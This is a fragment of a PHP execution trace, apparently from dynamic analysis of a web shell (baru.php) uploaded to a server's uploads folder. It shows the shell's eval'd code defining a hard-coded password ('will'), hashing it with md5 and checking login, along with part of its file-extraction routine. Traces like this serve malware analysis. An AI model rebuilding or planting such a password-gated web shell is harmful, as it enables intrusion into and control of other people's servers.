gzclose($gzp);\r\n\t\t\r\n\t\t\ttouch($to.$header[\'filename\'], $header[\'mtime\']);\r\n\t\t\t@unlink($to.$header[\'filename\'].\'.gz\');\r\n\t\t\t\r\n\t\t}\r\n\t}\r\n\t\r\n\t$this->total_files ++;\r\n\techo "ļ: $to$header[filename]<br>";\r\n\treturn true;\r\n }\r\n}\r\nob_end_flush();'	/var/www/html/uploads/baru.php(20) : runtime-created function	1	0
4	231	0	0.020892	1566608	ob_start	0		/var/www/html/uploads/baru.php(20) : runtime-created function(1) : eval()'d code	1	0
4	231	1	0.020913	1583120
4	231	R			TRUE
4	232	0	0.020930	1583120	define	0		/var/www/html/uploads/baru.php(20) : runtime-created function(1) : eval()'d code	2	2	'myaddress'	'/var/www/html/uploads/baru.php'
4	232	1	0.020949	1583224
4	232	R			TRUE
4	233	0	0.020963	1583152	define	0		/var/www/html/uploads/baru.php(20) : runtime-created function(1) : eval()'d code	3	2	'postpass'	'will'
4	233	1	0.020979	1583256
4	233	R			TRUE
4	234	0	0.020992	1583184	define	0		/var/www/html/uploads/baru.php(20) : runtime-created function(1) : eval()'d code	4	2	'shellname'	''
4	234	1	0.021008	1583288
4	234	R			TRUE
4	235	0	0.021020	1583216	define	0		/var/www/html/uploads/baru.php(20) : runtime-created function(1) : eval()'d code	5	2	'myurl'	''
4	235	1	0.021035	1583320
4	235	R			TRUE
4	236	0	0.021049	1583248	get_magic_quotes_gpc	0		/var/www/html/uploads/baru.php(20) : runtime-created function(1) : eval()'d code	6	0
4	236	1	0.021064	1583248
4	236	R			FALSE
4	237	0	0.021085	1583248	md5	0		/var/www/html/uploads/baru.php(20) : runtime-created function(1) : eval()'d code	14	1	'will'
4	237	1	0.021101	1583344
4	237	R			'18218139eec55d83cf82679934e5cd75'
4	238	0	0.021119	1583248	islogin	1		/var/www/html/uploads/baru.php(20) : runtime-created function(1) : eval()'d code	23	2	''	''
4	238	1	0.021137	1583248
			0.021179	1487416
TRACE END   [2023-02-12 22:48:07.888831]

